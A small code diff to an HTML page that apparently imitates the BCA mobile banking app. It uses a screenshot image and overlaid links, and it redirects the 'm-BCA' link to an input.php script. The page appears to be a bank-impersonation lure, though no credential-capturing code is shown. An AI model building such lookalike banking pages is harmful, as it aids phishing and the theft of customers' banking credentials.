--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
 <body>
   <img style="z-index: 0" src="https://res.cloudinary.com/codelifings/image/upload/v1613358205/Tak_berjudul41_mnu1wt.jpg" alt="bca mobile">
   <div style="position: absolute; z-index: 1; font-family: 'Roboto', sans-serif;">
-    <a style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px;" href="input.html">m-BCA</a>
+    <a style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px;" href="input.php">m-BCA</a>
     <a href="https://m.klikbca.com/login.jsp" style="position: absolute; top: -80px; left: -50px">KlikBCA</a>
     <a href="https://www.bca.co.id/promo?i=ddbccf03bb349e45f699f1a396a55b023a185b815ccfb33c1166015b462ffe85" style="position: absolute; width: 150px; left: -50px">Info BCA</a>
   </div>
